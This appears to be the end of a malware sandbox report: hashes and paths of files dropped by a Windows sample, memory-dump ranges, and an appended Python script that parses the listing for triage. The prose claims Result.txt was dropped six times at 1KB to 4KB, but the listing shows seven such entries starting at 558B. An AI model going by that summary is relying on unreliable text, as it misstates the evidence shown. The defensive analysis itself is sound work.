                                              MD5

                                              4633b298d57014627831ccac89a2c50b

                                              SHA1

                                              e5f449766722c5c25fa02b065d22a854b6a32a5b

                                              SHA256

                                              b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                              SHA512

                                              29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                            • C:\Windows\TEMP\buzcwvvny\1596.dmp

                                              Filesize

                                              1.2MB

                                              MD5

                                              2e02c1bd0352aa2552463faa33357b95

                                              SHA1

                                              3bef730967a76fed2c23e5b5edd204b3b65a54b3

                                              SHA256

                                              bd7c1b3f525ea41af3745b0a3310f23de8e7d1dbe7a3976a271d1e03d1e57767

                                              SHA512

                                              691a4c8b015bf69e6013a9b4f37ce9ab4d56f8b2246ad9ba1b781012bdf9073eeeafc8d744594dec26ae8e959a97a944f6ff7840bfee8e0c357f3bc8a15136dc

                                            • C:\Windows\TEMP\buzcwvvny\2104.dmp

                                              Filesize

                                              4.2MB

                                              MD5

                                              7f28878f9a65c47c6cd42b22a6a88cff

                                              SHA1

                                              850294e02928d902bce9eda5309993ed0aa92c31

                                              SHA256

                                              9ff1f3798c63694f5aebbc4cb38e2ec677cbb66715386745b064c2b799428135

                                              SHA512

                                              9ebcb77037fb94b16e816fffefad73f9d74bcdd0b4fbdf835e75b0fc46fc3f59c9b7716662f90f87cc8273a029b9bfbf8bc44cd8f0809d4c75a4862726ec1052

                                            • C:\Windows\TEMP\buzcwvvny\2644.dmp

                                              Filesize

                                              3.6MB

                                              MD5

                                              be8144701388c3c975593abc9bef5d38

                                              SHA1

                                              941a682042c2c21f318baf66aa56595bf4ea94a8

                                              SHA256

                                              85744a7785d4ec474c0444d3278f050fce7e478d7816bb6162d99f870f4494de

                                              SHA512

                                              a7aab6a28646112d454e2cc817b593b38c8d23895b23525bc7b1c671dc810c751dada2bd9c48e12db7d97cac281212d945eefbc4927a0d34da45b424426ef556

                                            • C:\Windows\TEMP\buzcwvvny\2784.dmp

                                              Filesize

                                              2.9MB

                                              MD5

                                              8f2b0bfdd6618e7a7c68277933da237b

                                              SHA1

                                              a456d203ead53e59b75e7b3b9046cc04c506da21

                                              SHA256

                                              159739a9ea0a8b9ea7b45525eef7f44b4c08949725baf6dd1ba5e2cf7e0332f1

                                              SHA512

                                              4ab7ac1291d48961fcbbe0a091719979fc6f67d5d7c4d48ab3efc5f841f494aab70059f2abfff4edcb95cbaf8c45d07906d39b2fccd42221a7b36feedb209bc4

                                            • C:\Windows\TEMP\buzcwvvny\2836.dmp

                                              Filesize

                                              7.5MB

                                              MD5

                                              f4055485a3977cdeacf1d8560eb4bdf3

                                              SHA1

                                              cff74888827738868973b8ef50e7720ebd273c8a

                                              SHA256

                                              18c873e29d20626a49748c663818c073723fd896507a92eb465189547e375873

                                              SHA512

                                              52f1f4b6e2f710d80085d68d4195ab50b2c54520342355808a88ef7039c5620e86e1331e4ef0c62d3c17606aa4aa463b37c2ec44647a2dab0fc3311a2eb88657

                                            • C:\Windows\TEMP\buzcwvvny\3080.dmp

                                              Filesize

                                              814KB

                                              MD5

                                              384824842f742b88fe6af98623eb08a8

                                              SHA1

                                              4473383c4ad7b1a6f5633d70ba91c6777c46b7e5

                                              SHA256

                                              dfdd5cc393dc91f9fa8bad117ab4177fef94fdf8b53181b47f17ef8098c9c9ab

                                              SHA512

                                              d13b89c14acb733ebabd179cfe7f58b5015fd8366783d8a97f060d4cdaf006aafd82dc16b1f8c2e62caeb40b0aa45055457fca810bc5ba2d8516543e6a8285c0

                                            • C:\Windows\TEMP\buzcwvvny\3824.dmp

                                              Filesize

                                              2.5MB

                                              MD5

                                              b8f293a19a6e558d246daf738071c839

                                              SHA1

                                              85ccecb7195c2d40a540f005224a4a86ce359540

                                              SHA256

                                              2a6fc3ec3b909292e7cc24d79e49f5a66d4f9b23895fbde195570b9526c02b5e

                                              SHA512

                                              44a373f30568d901c013dfb62f4d1e32412e2eb35d286766aa6a66b6b0c851192e7906b7614fb8561beb44d5e66fa1f14d3a93f6ec5c9d09193785855e8862f1

                                            • C:\Windows\TEMP\buzcwvvny\3832.dmp

                                              Filesize

                                              8.7MB

                                              MD5

                                              d612bef67d78a963338cd1047318a1fc

                                              SHA1

                                              7b3e4387b1198cb6a93c9f465dbc8cf68972bc4b

                                              SHA256

                                              c142d3e474e6be99e6579d87e8a18bcfc39c7327d93abeee922122f5afe2e081

                                              SHA512

                                              66e0e216061f7bed462e7b754fff93a2647fe6529670deb852f6f66dd570ee31382ee81b4afded17081348aadd478cf17d4ed9856e56cd6593a3d3a4315bb708

                                            • C:\Windows\TEMP\buzcwvvny\3916.dmp

                                              Filesize

                                              20.8MB

                                              MD5

                                              712b819ee02316cafcecbec67ef4d59c

                                              SHA1

                                              86142fc1729f89c65622e323f2a5dfb6276bbb8a

                                              SHA256

                                              28a5670ee9cfbf50e90e02ae9f6e36f792844ed282fbe1feb404f6451cdb8592

                                              SHA512

                                              89580d78f8f28834d5a24d6d481794f134840a809606c581c6793041f98f68446a5e57a5fbec693d3f24f1c9d62e41476a7d5cbae4b9585831d93cc1034829e7

                                            • C:\Windows\TEMP\buzcwvvny\3984.dmp

                                              Filesize

                                              4.3MB

                                              MD5

                                              10f0a05f8f7efee21edefce9f8d217ad

                                              SHA1

                                              9878ae913a9cd720413f9d05df44cb3bc5e03af9

                                              SHA256

                                              e85015c8f8623065c3300a9072c35c8d81b477ff66571a696ca66f4a2946d39e

                                              SHA512

                                              db875c373b3ef2b4c49865e0fdb2c93d856498674c33d6ad31de4f8506729faaf14e265a4e46d46f27074cf446e974590e66ca5da6e548ec1760f7d1b2a5d7f1

                                            • C:\Windows\TEMP\buzcwvvny\4076.dmp

                                              Filesize

                                              43.9MB

                                              MD5

                                              74d78fe1e287008457c230b7156f3743

                                              SHA1

                                              fecf219aa25c30e3959e31f48f3fc149ef58f64c

                                              SHA256

                                              c2e76c3e24de35bcf6183a8bb4388db137f66a01c3e23afbb04f1537a8f82e98

                                              SHA512

                                              e270736b0c373d471394865d16b52afcbf7710feb58db3ebf0000a5f1459ecb96865ffa8eba69d729f42e1ce0b7fc768377c20588a9911c57fe1a2e4643e417f

                                            • C:\Windows\TEMP\buzcwvvny\4196.dmp

                                              Filesize

                                              25.9MB

                                              MD5

                                              2fb5c999fae4dba372efb0d38abfa0f2

                                              SHA1

                                              06b22105f6a5d40d4bc0bd2c8d556b851baa6261

                                              SHA256

                                              c833d7f42674b31e2b8a28dfea427dd85d69e2b7b311c087535883514e7add91

                                              SHA512

                                              27ed544e922fcdb4899154cff4c7487ae1f726f61bceab225a3dbe2a06142fa348613d4671d6f5437e3912edba951e891f5612b673647bc6c72f1fb26cb3e1c5

                                            • C:\Windows\TEMP\buzcwvvny\60.dmp

                                              Filesize

                                              33.5MB

                                              MD5

                                              776f43a3b868dd660483e5fa15a0ebb7

                                              SHA1

                                              b6a3d7f6042e78e5bae9f39eba0c89b10460567a

                                              SHA256

                                              e15afe7482a3a029bbadd3c0700a200956d5f3b1bb81c4dcae849769e29968b7

                                              SHA512

                                              33566dd98a4758800f965442d013c7b2072d7decdb547282b1f88ef9a7792063d21ec852a02702e10cd42451d4c0410c6351ff55c0b0ff170bea04d41c032d13

                                            • C:\Windows\TEMP\buzcwvvny\776.dmp

                                              Filesize

                                              3.3MB

                                              MD5

                                              04ccf2d1e8a234e83daff3850d6b10d5

                                              SHA1

                                              68fd9d01b1424c8933a02cb94adff828935dd779

                                              SHA256

                                              0a0b0ac4d0a71b0b7f98ed5015f74b728f2091970297d3e570add5d732663b8d

                                              SHA512

                                              a6b54b3a9bddaddba91ab7f0d51deee23044c2051c33fd8b436d8a0c950cecc0bb64c43ef7fd9e28312354dbe5ca9c031a44156a266140d6fd178712705eea1a

                                            • C:\Windows\TEMP\ltbmbiubv\config.json

                                              Filesize

                                              693B

                                              MD5

                                              f2d396833af4aea7b9afde89593ca56e

                                              SHA1

                                              08d8f699040d3ca94e9d46fc400e3feb4a18b96b

                                              SHA256

                                              d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

                                              SHA512

                                              2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

                                            • C:\Windows\Temp\buzcwvvny\vmgumyclb.exe

                                              Filesize

                                              126KB

                                              MD5

                                              e8d45731654929413d79b3818d6a5011

                                              SHA1

                                              23579d9ca707d9e00eb62fa501e0a8016db63c7e

                                              SHA256

                                              a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

                                              SHA512

                                              df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

                                            • C:\Windows\Temp\ltbmbiubv\ttittb.exe

                                              Filesize

                                              343KB

                                              MD5

                                              2b4ac7b362261cb3f6f9583751708064

                                              SHA1

                                              b93693b19ebc99da8a007fed1a45c01c5071fb7f

                                              SHA256

                                              a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

                                              SHA512

                                              c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

                                            • C:\Windows\Temp\nsoDB6E.tmp\System.dll

                                              Filesize

                                              11KB

                                              MD5

                                              2ae993a2ffec0c137eb51c8832691bcb

                                              SHA1

                                              98e0b37b7c14890f8a599f35678af5e9435906e1

                                              SHA256

                                              681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

                                              SHA512

                                              2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

                                            • C:\Windows\Temp\nsoDB6E.tmp\nsExec.dll

                                              Filesize

                                              6KB

                                              MD5

                                              b648c78981c02c434d6a04d4422a6198

                                              SHA1

                                              74d99eed1eae76c7f43454c01cdb7030e5772fc2

                                              SHA256

                                              3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

                                              SHA512

                                              219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

                                            • C:\Windows\Temp\xohudmc.exe

                                              Filesize

                                              72KB

                                              MD5

                                              cbefa7108d0cf4186cdf3a82d6db80cd

                                              SHA1

                                              73aeaf73ddd694f99ccbcff13bd788bb77f223db

                                              SHA256

                                              7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

                                              SHA512

                                              b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

                                            • C:\Windows\buzcwvvny\Corporate\vfshost.exe

                                              Filesize

                                              381KB

                                              MD5

                                              fd5efccde59e94eec8bb2735aa577b2b

                                              SHA1

                                              51aaa248dc819d37f8b8e3213c5bdafc321a8412

                                              SHA256

                                              441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

                                              SHA512

                                              74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

                                            • C:\Windows\buzcwvvny\mmzbiruiz\Result.txt

                                              Filesize

                                              558B

                                              MD5

                                              e72ec75be88e6e6cce77b83da062e85a

                                              SHA1

                                              c0ebc771b23c2751f81c621feb0b9dd898c07e01

                                              SHA256

                                              bf712d031b07c79e1bbf9b2cf29fffb6b98f391d12e7369afafc7d83d9486f9d

                                              SHA512

                                              78a1d535a4ef474135c80c1c17d260e17c679c169376218ea69e6630492eb8b60d7b721e0b45d39912372d24bf7dcb6d28ed258958030b14f720aaed2494eb52

                                            • C:\Windows\buzcwvvny\mmzbiruiz\Result.txt

                                              Filesize

                                              1KB

                                              MD5

                                              2b53d11eec9418c3935606f9f32816f8

                                              SHA1

                                              696f0cf5b91703574dac7559cee10432c1a8ad24

                                              SHA256

                                              df51b13c49f97d6b736bfa72d33b8c9ac5616410565b5bad11227f13685768f0

                                              SHA512

                                              bf14a12887ca6531057be3e61a2f749998fbd4988b6741948a352b2a7011eb0a2e987fbb1a471205f157edacfc67103539a686d809218ebee8f10d284b857cd0

                                            • C:\Windows\buzcwvvny\mmzbiruiz\Result.txt
                                              Filesize 1KB
                                              MD5 7afa11badf3f82cf3d3e091c265ae6e5
                                              SHA1 4b813eb4818747ffe1bd85cf0a21b26397008cc4
                                              SHA256 2a11a069562e2071004bb95f8f385f57b6deb1a641714f84f0c564959d1497da
                                              SHA512 f63f9bc34c4b2614c6e8461a6e8b53dc76707505eb8600f316754ddb6f6066c071e5dfd8863172a648e3c6121a81ae3cbc8e7cae3c82960fc9fceb473ce756df

                                            • C:\Windows\buzcwvvny\mmzbiruiz\Result.txt
                                              Filesize 1KB
                                              MD5 88e26125500fc6475fff3ae8cc9e8dd0
                                              SHA1 a5b9494dd7cb9613b46ca787b6f15b0187db8527
                                              SHA256 b33892a39db3473e0d39abd65552a25a3ec539dd78dff3625e73a9a94a7ba273
                                              SHA512 71b3e527472b587295ab0a09686873cd6ac1397097c98a15dbe9c8464c9b6f8289a22619d7e831954ea07ee95a59e82293f07cb0ed7ebddbcf8071b27f134bc6

                                            • C:\Windows\buzcwvvny\mmzbiruiz\Result.txt
                                              Filesize 2KB
                                              MD5 d9aa99a2d9a8afeef3d2c35211121e46
                                              SHA1 6ff5df65269d8a1474361d4da300c27fb3ed5bff
                                              SHA256 ed0f807986a3c5d23e243e62d34dac14f8348abda3b58ab4b73200d5856693b1
                                              SHA512 a52d737d6f0b50e5a277ab77989613cf3acc708de0eb2f9a3aaabd17b978d70041aa67c258b161a38243e4aab9572a15e116a473c785c76e291de797c04964ff

                                            • C:\Windows\buzcwvvny\mmzbiruiz\Result.txt
                                              Filesize 3KB
                                              MD5 c33402d4bc83793a354c9b98b93ea713
                                              SHA1 e5f083097bf492ab90ba490d59caba7e82dd9214
                                              SHA256 719f8624f58c45f28de04788c315d35f61c27c69bf816924bc5b23dbe64c33d2
                                              SHA512 56ab8e4c027d03e90f00d42b3e6566aa3420fb60054d327fdee50e85894ecbfdcd280882e1801d2538de26241fb0f211730d540d44ca7c0e0358e470a07f87c8

                                            • C:\Windows\buzcwvvny\mmzbiruiz\Result.txt
                                              Filesize 4KB
                                              MD5 60e099baccbe60c5b1095bd5bbc4b6ee
                                              SHA1 4763f1ec8e82297d9f99c1fb326f1a1fa131b66b
                                              SHA256 b5c41b0a5c6c3f698c514259cb67c92290186a8328d02e7b135a25c88c0980bf
                                              SHA512 53f72326589b67325955cd4a4cee4b01c5685b2a4a624cfd957cc604825add28fcda34e6de38391131f82dc8d990fad1eec17b100172ca321292e7a9d0973a65

                                            • C:\Windows\buzcwvvny\mmzbiruiz\tpviuibgv.exe
                                              Filesize 332KB
                                              MD5 ea774c81fe7b5d9708caa278cf3f3c68
                                              SHA1 fc09f3b838289271a0e744412f5f6f3d9cf26cee
                                              SHA256 4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
                                              SHA512 7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

                                            • C:\Windows\buzcwvvny\mmzbiruiz\wpcap.exe
                                              Filesize 424KB
                                              MD5 e9c001647c67e12666f27f9984778ad6
                                              SHA1 51961af0a52a2cc3ff2c4149f8d7011490051977
                                              SHA256 7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
                                              SHA512 56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

                                            • C:\Windows\system32\drivers\etc\hosts
                                              Filesize 1KB
                                              MD5 c838e174298c403c2bbdf3cb4bdbb597
                                              SHA1 70eeb7dfad9488f14351415800e67454e2b4b95b
                                              SHA256 1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
                                              SHA512 c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

                                            • C:\Windows\tmbllbvl\ibebikp.exe
                                              Filesize 7.0MB
                                              MD5 5ee31d89acada951cda57a802a796a22
                                              SHA1 da54a6bed684e05937481f697fe9ed2b70572970
                                              SHA256 690dfeab98b5799139de276d6305eae0ea226c39b5f92595bcbdda7ae72cbc8d
                                              SHA512 d0545ac1d195e59ced55ce1667fb295e1680a5de951b0d84277b919fd3b393d877cb23981b387e6548670a6e7dc1c0c5891472cc7aff75a1173b916035134de8

                                            • memory/8-229-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp  Filesize 364KB
                                            • memory/800-244-0x0000000000A50000-0x0000000000A62000-memory.dmp  Filesize 72KB
                                            • memory/1044-232-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp  Filesize 364KB
                                            • memory/1796-207-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp  Filesize 364KB
                                            • memory/2068-177-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp  Filesize 364KB
                                            • memory/2248-168-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp  Filesize 364KB
                                            • memory/2392-203-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp  Filesize 364KB
                                            • memory/2628-194-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp  Filesize 364KB
                                            • memory/3032-135-0x00007FF78A5F0000-0x00007FF78A6DE000-memory.dmp  Filesize 952KB
                                            • memory/3032-133-0x00007FF78A5F0000-0x00007FF78A6DE000-memory.dmp  Filesize 952KB
                                            • memory/3108-218-0x00007FF797460000-0x00007FF797580000-memory.dmp  Filesize 1.1MB
                                            • memory/3108-162-0x00007FF797460000-0x00007FF797580000-memory.dmp  Filesize 1.1MB
                                            • memory/3108-196-0x00007FF797460000-0x00007FF797580000-memory.dmp  Filesize 1.1MB
                                            • memory/3108-209-0x00007FF797460000-0x00007FF797580000-memory.dmp  Filesize 1.1MB
                                            • memory/3108-495-0x00007FF797460000-0x00007FF797580000-memory.dmp  Filesize 1.1MB
                                            • memory/3108-494-0x00007FF797460000-0x00007FF797580000-memory.dmp  Filesize 1.1MB
                                            • memory/3108-165-0x000001B950CD0000-0x000001B950CE0000-memory.dmp  Filesize 64KB
                                            • memory/3108-245-0x00007FF797460000-0x00007FF797580000-memory.dmp  Filesize 1.1MB
                                            • memory/3108-175-0x00007FF797460000-0x00007FF797580000-memory.dmp  Filesize 1.1MB
                                            • memory/3108-230-0x00007FF797460000-0x00007FF797580000-memory.dmp  Filesize 1.1MB
                                            • memory/3108-179-0x00007FF797460000-0x00007FF797580000-memory.dmp  Filesize 1.1MB
                                            • memory/3284-3-0x0000000000400000-0x0000000000A9B000-memory.dmp  Filesize 6.6MB
                                            • memory/3296-234-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp  Filesize 364KB
                                            • memory/3376-227-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp  Filesize 364KB
                                            • memory/3452-212-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp  Filesize 364KB
                                            • memory/3568-139-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp  Filesize 364KB
                                            • memory/3568-154-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp  Filesize 364KB
                                            • memory/3964-186-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp  Filesize 364KB
                                            • memory/4088-216-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp  Filesize 364KB
                                            • memory/4180-159-0x0000000000400000-0x0000000000412000-memory.dmp  Filesize 72KB
                                            • memory/4180-146-0x0000000010000000-0x0000000010008000-memory.dmp  Filesize 32KB
                                            • memory/4228-172-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp  Filesize 364KB
                                            • memory/4324-199-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp  Filesize 364KB
                                            • memory/4348-190-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp  Filesize 364KB
                                            • memory/4932-75-0x0000000001590000-0x00000000015DC000-memory.dmp  Filesize 304KB
                                            • memory/5016-224-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp  Filesize 364KB
                                            • memory/5052-182-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp  Filesize 364KB
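
The dropped-file and memory-dump entries above are easier to work with as structured records than in the report's label/value layout. The following Python script is an added example and is not part of the tria.ge report: it parses a listing of this kind (accepting both the one-label-per-line layout and a compact `Label value` layout), then answers two triage questions the raw list only hints at: which paths were written more than once with different hashes (here `Result.txt`, dropped six times at sizes from 1KB to 4KB), and which memory-dump address ranges recur across processes (here the 364KB range at 0x00007FF793F20000, present in dumps from eighteen PIDs). The embedded sample is a constructed subset of entries copied from this listing; the function names, the fixed label set and the `memory/<pid>-<index>-<start>-<end>-memory.dmp` naming assumption are the script's own.

```python
"""Parse a tria.ge dropped-file / memory-dump listing into triage records.

Added example, not part of the tria.ge report.  Handles both the report's
one-label-per-line layout and a compact 'Label value' layout.
"""
import re
from collections import defaultdict

# Labels the listing uses for each entry (assumption: this fixed set).
LABELS = {"Filesize", "MD5", "SHA1", "SHA256", "SHA512"}
# Assumed dump naming: memory/<pid>-<index>-<start>-<end>-memory.dmp
MEM_RE = re.compile(
    r"^memory/(\d+)-(\d+)-(0x[0-9A-Fa-f]+)-(0x[0-9A-Fa-f]+)-memory\.dmp$")

# Constructed sample: a subset of entries copied from this report's listing,
# deliberately mixing the two layouts the parser accepts.
SAMPLE = r"""
• C:\Windows\buzcwvvny\mmzbiruiz\Result.txt
  Filesize 1KB
  MD5 7afa11badf3f82cf3d3e091c265ae6e5
  SHA256 2a11a069562e2071004bb95f8f385f57b6deb1a641714f84f0c564959d1497da
• C:\Windows\buzcwvvny\mmzbiruiz\Result.txt

  Filesize

  4KB

  MD5

  60e099baccbe60c5b1095bd5bbc4b6ee

  SHA256

  b5c41b0a5c6c3f698c514259cb67c92290186a8328d02e7b135a25c88c0980bf

• C:\Windows\system32\drivers\etc\hosts
  Filesize 1KB
  SHA256 1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
• memory/8-229-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp
  Filesize 364KB
• memory/3568-139-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp
  Filesize 364KB
• memory/3568-154-0x00007FF793F20000-0x00007FF793F7B000-memory.dmp
  Filesize 364KB
• memory/3108-162-0x00007FF797460000-0x00007FF797580000-memory.dmp
  Filesize 1.1MB
"""


def parse_listing(text):
    """Return one dict per '•' entry: {'path': ..., 'Filesize': ..., 'SHA256': ...}."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    records, i = [], 0
    while i < len(lines):
        line = lines[i]
        if line.startswith("•"):
            records.append({"path": line[1:].strip()})
        elif records:
            parts = line.split(None, 1)
            if parts[0] in LABELS:
                if len(parts) == 2:              # compact 'Label value'
                    value = parts[1].strip()
                elif i + 1 < len(lines):         # label alone, value on next line
                    i += 1
                    value = lines[i]
                else:
                    value = ""
                records[-1][parts[0]] = value
        # Text before the first '•' (the tail of a record cut off by paging)
        # is skipped rather than attributed to the wrong entry.
        i += 1
    return records


def redropped_paths(records):
    """Paths written more than once with differing SHA256 -> [(Filesize, SHA256), ...]."""
    by_path = defaultdict(list)
    for rec in records:
        if not rec["path"].startswith("memory/"):
            by_path[rec["path"]].append((rec.get("Filesize"), rec.get("SHA256")))
    return {p: v for p, v in by_path.items() if len({sha for _, sha in v}) > 1}


def shared_mappings(records):
    """(start, end) address range -> sorted PIDs whose memory dumps cover it."""
    by_range = defaultdict(set)
    for rec in records:
        m = MEM_RE.match(rec["path"])
        if m:
            pid, _index, start, end = m.groups()
            by_range[(start, end)].add(int(pid))
    return {rng: sorted(pids) for rng, pids in by_range.items()}


if __name__ == "__main__":
    recs = parse_listing(SAMPLE)
    for path, versions in redropped_paths(recs).items():
        print(f"re-dropped with changing content: {path}")
        for size, sha in versions:
            print(f"    {size or '?':>6}  {sha}")
    for (start, end), pids in shared_mappings(recs).items():
        print(f"{start}-{end} mapped in {len(pids)} PID(s): {pids}")
```

Paste the full listing into `parse_listing` instead of `SAMPLE` to get every entry; the hash strings are carried through untouched, so the `SHA256` values can go straight into a blocklist, and `shared_mappings` makes the repeated base address visible as a single line instead of nineteen.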